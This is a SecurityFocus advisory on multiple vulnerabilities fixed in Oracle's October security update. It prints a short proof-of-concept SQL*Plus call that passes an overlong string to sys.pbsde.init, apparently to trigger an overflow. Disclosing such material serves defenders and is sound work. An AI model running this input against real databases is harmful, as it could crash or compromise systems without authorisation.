Oracle October Security Update Multiple Vulnerabilities

An exploit would not be required for some of these issues such as the SQL injection vulnerabilities. Other issues would likely require exploit code.

The following proof of concept code provided by <oracle_secalert@hushmail.com> is available for DB27:

SQL> exec
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;

---
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus